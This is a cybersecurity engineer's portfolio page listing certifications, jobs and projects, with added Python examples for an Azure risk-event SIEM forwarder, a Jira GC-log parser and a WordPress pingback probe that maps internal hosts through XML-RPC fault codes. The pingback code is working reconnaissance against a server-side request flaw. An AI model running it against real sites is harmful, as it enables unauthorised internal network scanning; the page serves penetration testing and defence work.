Paulo Hennig

Cyber Security Engineer

Cloud Security - AWS / Azure

Automation - Python / Shell Script

Code Review - Java / Javascript / PHP / Python

IaC - Cloudformation / Terraform

Red Team

Pentester

About Me

Hello! I’m Paulo Hennig.

Cyber Security Professional with a focus across CloudSec and Offensive Security. Feel free to contact/add me @ Linkedin

Expertise
Code Review

Code review of web applications (Java, C#, PHP, JavaScript and Python), identifying vulnerabilities and providing remediation guidance for each finding (e.g., parameterized queries, unpredictable tokens/secrets, input validation and sanitization, validation around serialization/deserialization of objects).

Penetration Testing

Pentesting and ethical hacking across infrastructure services, web applications and mobile apps, including bug bounty work on private programs through Synack.

CloudSec

Administration of multi-account cloud environments, including IAM management (users, roles, trust relationships, permissions boundaries) through IaC such as Terraform, and implementation of restrictions on regions, services and actions across an organization's hierarchy. Configuration of security services on AWS (e.g., Config, WAF, Security Hub, GuardDuty) and Azure (e.g., Security Center, Sentinel, Risk Detection, Identity Protection), integrating them with SOC tools and processes.

Customer Service

As a former Atlassian Senior Support Engineer, I'm delighted to provide a great customer experience with soft and technical skills.

Unix

Administration of different systems/servers such as Linux, AIX and HP-UX, managing their services (e.g., web server, VPN) and applying hardening.

Certifications
InfoSec
----
  • OSWE
  • OSCP
  • OSWP
  • CRTP
  • SCS-C01 (AWS Security Specialty)
  • AZ-500 (Azure Security Engineer Associate)
  • ISO/IEC 27001 (Exin)
  • DESEC Penetration Tester
IT Certs
----
  • AZ-900
  • CompTIA Linux+
  • LPIC-1
  • Postgres Advanced Server 9.6 (EDB)
  • Novell Certified Linux Administrator (CLA)
Experience
2020 - Present
Cyber Security Specialist
Agi
2020 - 2020
Cyber Security Analyst
Viewdeck

Assistance in cyber-security incidents (e.g., phishing, spear phishing, DDoS, compromised users, malware, social engineering, credential harvesting), focused on Azure environments, using the following tools and technologies:

  • Sentinel
  • Microsoft Cloud App Security
  • Azure Advanced Threat Protection
  • O365 environment (data loss prevention, filters, phishing campaigns, safe attachments)
  • Identity Management/Protection
  • Security Center
  • Web Application Firewall
  • Security Scores
  • Playbooks
2019 - Present
Security Researcher
SYNACK Red Team

Bug bounty hunter at private programs

2015 - 2020
Senior Support Engineer
Atlassian

Legendary support for on-premises customers around the world who rely on the Atlassian suite. Besides working on support cases, creating how-to documentation and assisting our global team in removing technical roadblocks, my day to day also included:

  • Creation and curation of training according to our needs
  • Go-to person for analyzing pentest reports and security issues brought by our customers
  • Reviewing support cases, aiming at the development of several abilities (e.g., soft skills, troubleshooting, empathy, sense of urgency) that make up what we consider legendary support
  • Coaching engineers when noticing opportunities for improvement such as management of time/backlog
  • Investigation of performance issues, including GC logs, thread dumps, and heap dumps
2013 - 2015
Support Analyst
Service IT

Responsible for managing our customers' infrastructure, focused on Unix environments (AIX, HP-UX, Linux), and for implementing Nagios as a monitoring solution.

My Skills
InfoSec
  • CloudSec (AWS and Azure)
  • SIEM / SOAR
  • Purple Team (red | blue team)
  • DevSecOps
  • NIST
  • IaC
  • Incident Response
  • SAST
  • Security Operation Center
  • Pentest - Services/Web/Mobile
Languages
  • English
  • Portuguese
  • Spanish
Coding
  • Python
  • Shell Scripting
  • Javascript
  • PHP
  • C#
  • Java
Knowledge
  • Hosting Services
  • Hybrid Environments
  • Customer Service
  • OWASP Top 10
  • Cloud
  • NIST Framework
  • Relational Databases
  • WAF / Firewall
  • Ethical Hacking
Recent Projects
Azure Identity Protection - Log Stream
cyber-security

Azure risk detection event handler that parses the events and forwards them to a SIEM solution, giving security teams visibility of the different event types (e.g., leaked credentials, atypical travel, anonymous proxy) so they can act on them in a timely manner.

Integration established via AppRole authentication against HashiCorp Vault and an Azure app registration with Microsoft Graph permissions (IdentityRiskEvent.Read.All and IdentityRiskyUser.Read.All), so that the events can be fetched.
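The following is an added illustration of that pipeline, not the project's own code. It assumes an Azure app registration holding the application permission IdentityRiskEvent.Read.All, whose client secret is fetched from HashiCorp Vault after an AppRole login, and a SIEM that accepts CEF lines over UDP syslog. The Graph page below is constructed; its field names follow the documented riskDetection resource, but every value is made up. Only the request builders, the CEF conversion and the de-duplication run here; nothing is sent.

```python
"""Azure Identity Protection risk detections -> SIEM (CEF over syslog)."""
import json
import socket
import urllib.parse
import urllib.request
from datetime import datetime, timezone

GRAPH_ROOT = "https://graph.microsoft.com/v1.0/identityProtection/riskDetections"
TOKEN_URL = "https://login.microsoftonline.com/{tenant}/oauth2/v2.0/token"

# CEF severity (0-10) per Graph riskLevel enum value.
SEVERITY = {"high": 9, "medium": 6, "low": 3, "hidden": 1, "none": 0, "unknownFutureValue": 5}


def approle_login_request(vault_addr, role_id, secret_id):
    """Vault AppRole login (POST /v1/auth/approle/login). The returned client
    token is then used to read the Azure client secret from a KV path."""
    return urllib.request.Request(
        f"{vault_addr}/v1/auth/approle/login",
        data=json.dumps({"role_id": role_id, "secret_id": secret_id}).encode(),
        headers={"Content-Type": "application/json"}, method="POST")


def graph_token_request(tenant, client_id, client_secret):
    """OAuth2 client-credentials grant; the .default scope maps to the
    application permissions consented on the app registration."""
    body = urllib.parse.urlencode({
        "grant_type": "client_credentials", "client_id": client_id,
        "client_secret": client_secret, "scope": "https://graph.microsoft.com/.default",
    }).encode()
    return urllib.request.Request(TOKEN_URL.format(tenant=tenant), data=body, method="POST")


def build_query(since):
    """First page URL: only detections newer than the last watermark, oldest first,
    so the watermark can be advanced safely while paging through @odata.nextLink."""
    filt = f"detectedDateTime gt {since.strftime('%Y-%m-%dT%H:%M:%SZ')}"
    return f"{GRAPH_ROOT}?$filter={urllib.parse.quote(filt, safe=':')}&$orderby=detectedDateTime%20asc&$top=500"


def _cef_header(v):  # header fields escape backslash and pipe
    return str(v).replace("\\", "\\\\").replace("|", "\\|")


def _cef_ext(v):  # extension values escape backslash, '=' and newlines
    return str(v).replace("\\", "\\\\").replace("=", "\\=").replace("\n", " ")


def to_cef(d):
    """One riskDetection resource -> one CEF line (rt is epoch milliseconds)."""
    detected = datetime.strptime(d["detectedDateTime"][:19], "%Y-%m-%dT%H:%M:%S").replace(tzinfo=timezone.utc)
    loc = d.get("location") or {}
    ext = {
        "rt": int(detected.timestamp() * 1000), "externalId": d["id"],
        "suser": d.get("userPrincipalName", ""), "suid": d.get("userId", ""),
        "src": d.get("ipAddress", ""),
        "cs1Label": "riskState", "cs1": d.get("riskState", ""),
        "cs2Label": "riskDetail", "cs2": d.get("riskDetail", ""),
        "cs3Label": "location",
        "cs3": ", ".join(v for v in (loc.get("city"), loc.get("countryOrRegion")) if v),
    }
    header = "|".join(_cef_header(x) for x in (
        "Microsoft", "AzureADIdentityProtection", "1.0",
        d["riskEventType"], d["riskEventType"], SEVERITY.get(d.get("riskLevel"), 5)))
    return "CEF:0|" + header + "|" + " ".join(f"{k}={_cef_ext(v)}" for k, v in ext.items())


def process_page(page, seen):
    """Convert one Graph page, skipping ids already forwarded (re-polls and
    lastUpdatedDateTime changes re-deliver the same id). Returns (lines, next_url)."""
    lines = []
    for d in page.get("value", []):
        if d["id"] in seen:
            continue
        seen.add(d["id"])
        lines.append(to_cef(d))
    return lines, page.get("@odata.nextLink")


def send_syslog(lines, host="127.0.0.1", port=514):
    """UDP syslog with PRI 13 (user.notice); the CEF line is the MSG part."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        for line in lines:
            s.sendto(f"<13>{line}".encode(), (host, port))


# Constructed sample page; shape follows the riskDetection resource, values are fake.
SAMPLE_PAGE = {
    "value": [
        {"id": "det-1", "riskEventType": "leakedCredentials", "riskLevel": "high",
         "riskState": "atRisk", "riskDetail": "none", "detectedDateTime": "2022-06-10T08:15:32.1234567Z",
         "userId": "u-1", "userPrincipalName": "alice@example.com", "ipAddress": "198.51.100.7",
         "location": {"city": "Porto Alegre", "countryOrRegion": "BR"}},
        {"id": "det-2", "riskEventType": "anonymizedIPAddress", "riskLevel": "medium",
         "riskState": "atRisk", "riskDetail": "none", "detectedDateTime": "2022-06-10T08:20:00Z",
         "userId": "u-2", "userPrincipalName": "bob@example.com", "ipAddress": "203.0.113.9",
         "location": {"countryOrRegion": "NL"}},
        {"id": "det-1", "riskEventType": "leakedCredentials", "riskLevel": "high",  # re-delivered
         "riskState": "confirmedCompromised", "riskDetail": "adminConfirmedUserCompromised",
         "detectedDateTime": "2022-06-10T08:15:32Z", "userId": "u-1",
         "userPrincipalName": "alice@example.com", "ipAddress": "198.51.100.7"},
    ],
    "@odata.nextLink": GRAPH_ROOT + "?$skiptoken=abc",
}

if __name__ == "__main__":
    for line in process_page(SAMPLE_PAGE, set())[0]:
        print(line)
```

The de-duplication set is the piece that matters in production: a detection's riskState changes after an admin confirms or dismisses it, and polling on detectedDateTime alone would emit it twice. Persist the seen set (or key on id plus lastUpdatedDateTime if state changes should also reach the SIEM) across runs.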


Google-leak
cyber-security

Gives SOC/blue teams awareness of shadow IT projects indexed by Google and of sensitive information/files that should not be publicly available, with integration to SIEM solutions via syslog.


Alerts to Jira Tickets
cyber-security

REST API integration with Microsoft Cloud App Security, AbuseIPDB and Jira, so that cyber security events can be tracked efficiently.


Performance Analyser
log-parsing

Parses Jira and Tomcat logs, isolating possible bottlenecks in the on-premises environment. Uses regexes to filter for full GCs and slow JQL.
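As an added illustration of the full-GC filtering described above (not the project's own code), the following parses HotSpot GC logs in the Java 8 -XX:+PrintGCDetails -XX:+PrintGCDateStamps layout, which is what an on-premises Jira typically writes, and flags the collections worth looking at. The log lines are constructed; the thresholds are assumptions. The slow-JQL filter follows the same shape with a different regex and is not shown.

```python
"""Full-GC pause extraction and bottleneck flagging for Java 8 GC logs."""
import re
from datetime import datetime

# Constructed sample in the PrintGCDetails/PrintGCDateStamps layout (ParallelGC).
SAMPLE_GC_LOG = """\
2022-06-01T10:15:30.123+0000: 1234.567: [GC (Allocation Failure) [PSYoungGen: 1048576K->65536K(1398272K)] 3000000K->2100000K(4194304K), 0.0912345 secs] [Times: user=0.30 sys=0.01, real=0.09 secs]
2022-06-01T10:16:02.456+0000: 1266.900: [Full GC (Ergonomics) [PSYoungGen: 65536K->0K(1398272K)] [ParOldGen: 2034464K->1500000K(2796032K)] 2100000K->1500000K(4194304K), [Metaspace: 250000K->250000K(1280000K)], 8.1234567 secs] [Times: user=24.10 sys=0.12, real=8.12 secs]
2022-06-01T10:20:11.789+0000: 1516.233: [Full GC (System.gc()) [PSYoungGen: 1024K->0K(1398272K)] [ParOldGen: 1900100K->1899000K(2796032K)] 1901124K->1899000K(4194304K), [Metaspace: 250000K->250000K(1280000K)], 0.4567890 secs] [Times: user=1.20 sys=0.02, real=0.46 secs]
"""

# Anchored on "[Full GC (<cause>) [" so young-only collections never match; the
# heap figures captured are the whole-heap before->after(total) that follows the
# per-generation brackets; the Metaspace bracket is optional (absent before Java 8).
FULL_GC = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d\.\d{3}[+-]\d{4}): (?P<uptime>[\d.]+): "
    r"\[Full GC \((?P<cause>[^\[]*?)\) \[.*?"
    r"(?P<before>\d+)K->(?P<after>\d+)K\((?P<total>\d+)K\)"
    r"(?:, \[Metaspace[^\]]*\])?, (?P<secs>[\d.]+) secs\]"
)


def parse_full_gcs(text):
    """Return one dict per Full GC line, in file order."""
    events = []
    for line in text.splitlines():
        m = FULL_GC.match(line)
        if not m:
            continue
        before, after = int(m["before"]), int(m["after"])
        events.append({
            "time": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S.%f%z"),
            "uptime_s": float(m["uptime"]),
            "cause": m["cause"],
            "pause_s": float(m["secs"]),
            "heap_before_mb": before // 1024,
            "heap_after_mb": after // 1024,
            "heap_total_mb": int(m["total"]) // 1024,
            "reclaimed_pct": (before - after) * 100.0 / before if before else 0.0,
        })
    return events


def bottlenecks(events, min_pause_s=1.0, min_reclaimed_pct=10.0):
    """Flag Full GCs that stall the JVM longer than min_pause_s, or that free less
    than min_reclaimed_pct of the heap (a Full GC that reclaims almost nothing
    points at a heap sized too small for the live set, or at a leak)."""
    flagged = []
    for e in events:
        reasons = []
        if e["pause_s"] >= min_pause_s:
            reasons.append(f"pause {e['pause_s']:.2f}s")
        if e["reclaimed_pct"] < min_reclaimed_pct:
            reasons.append(f"only {e['reclaimed_pct']:.1f}% reclaimed")
        if reasons:
            flagged.append((e, reasons))
    return flagged


if __name__ == "__main__":
    for e, reasons in bottlenecks(parse_full_gcs(SAMPLE_GC_LOG)):
        print(e["time"].isoformat(), e["cause"], e["heap_before_mb"], "->", e["heap_after_mb"], "MB;", "; ".join(reasons))
```

A Full GC whose cause is System.gc() is worth a separate look even when short: in Jira it usually comes from a plugin or from RMI's periodic explicit GC, both of which can be addressed without touching heap sizing.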


CVE-2019-11581
remediation

Documentation and remediation for template injection

CVE-2019-15001
remediation

Remediation by blocking a particular HTTP method

WP Internal Enumeration
red-team

Given how the “pingback” feature within WP is configured, you can enumerate internal services and servers on the same network as the target, assuming the module in question is vulnerable.
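Added illustration of that technique, not the project's own code: a pingback.ping request makes the WordPress server fetch an attacker-chosen source URL, and the XML-RPC fault it returns tells the two cases apart. The fault codes are the ones in wp-xmlrpc-server.php (16: the source URL could not be fetched; 17: it was fetched but contains no link to the target; 48: pingback already registered; 33: target is not a pingback-enabled post; 0: source and target are the same resource). The xmlrpc.php URL, the target post and the responses below are placeholders/constructed; the live probe is defined but not run.

```python
"""WordPress XML-RPC pingback as an internal-network probe."""
import xmlrpc.client as xc

WP_XMLRPC = "https://blog.example.com/xmlrpc.php"   # placeholder target
TARGET_POST = "https://blog.example.com/?p=1"        # must be a real, pingback-enabled post


def pingback_request(source_url):
    """Body POSTed to xmlrpc.php; WordPress fetches source_url server-side."""
    return xc.dumps((source_url, TARGET_POST), methodname="pingback.ping")


def classify(response_xml):
    """Map the XML-RPC reply to a verdict about source_url from the server's vantage point."""
    try:
        xc.loads(response_xml)          # a non-fault reply means the pingback was accepted
        return "open (page reachable and it links to the target)"
    except xc.Fault as f:
        return {
            16: "closed/unreachable (server could not fetch the source URL)",
            17: "open (server fetched the source URL; no link back to the target)",
            48: "open (pingback already registered from this source)",
            33: "target error: target is not a pingback-enabled post",
            0: "target error: source and target are the same resource",
        }.get(f.faultCode, f"unexpected fault {f.faultCode}: {f.faultString}")


def enumerate_offline(responses):
    """responses: {source_url: raw_xml reply collected from the target}."""
    return {url: classify(xml) for url, xml in responses.items()}


def probe(source_url, timeout=30):
    """Live probe (not run here): POST the request and classify the reply."""
    import urllib.request
    req = urllib.request.Request(
        WP_XMLRPC, data=pingback_request(source_url).encode(),
        headers={"Content-Type": "text/xml"}, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as r:
        return classify(r.read().decode())


# Constructed replies, serialised exactly as WordPress would emit the fault.
CONSTRUCTED_RESPONSES = {
    "http://10.0.0.5:8080/": xc.dumps(xc.Fault(
        17, "The source URL does not contain a link to the target URL, and so cannot be used as a source."),
        methodresponse=True),
    "http://10.0.0.5:22/": xc.dumps(xc.Fault(16, "The source URL does not exist."), methodresponse=True),
}

if __name__ == "__main__":
    for url, verdict in enumerate_offline(CONSTRUCTED_RESPONSES).items():
        print(url, "->", verdict)
```

Two caveats for a real engagement: a closed port and a non-existent host both come back as fault 16, so the response time is the only thing separating them; and WordPress has long fetched pingback sources through wp_safe_remote_get, whose URL validation rejects loopback and RFC 1918 addresses unless a plugin opens them up via the http_request_host_is_external filter, which is the "assuming the module is vulnerable" condition above.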


SQL Injection
red-team

Security project focused on red team activities: uses Google dorks (e.g., site:mysite.com) to discover candidate URLs and tests them for error-based SQL injection with GET requests sent through a web proxy.


Latest Posts
June 24, 2022 XSS through PHP_SELF

As per https://www.php.net/manual/en/reserved.variables.server.php, we can interpret PHP_SELF as: The filename of the currently executing script, relative to the document root….

May 24, 2022 Impact Awareness – bounty submission

Summary Given the fact that your bounty report might change your finding from being “accepted” and even your reward over…

May 16, 2022 CVE-2021-42943

Stored cross-site scripting (XSS) in admin/usermanager.php over IPPlan v4.92b allows remote attackers to inject arbitrary web script or HTML via…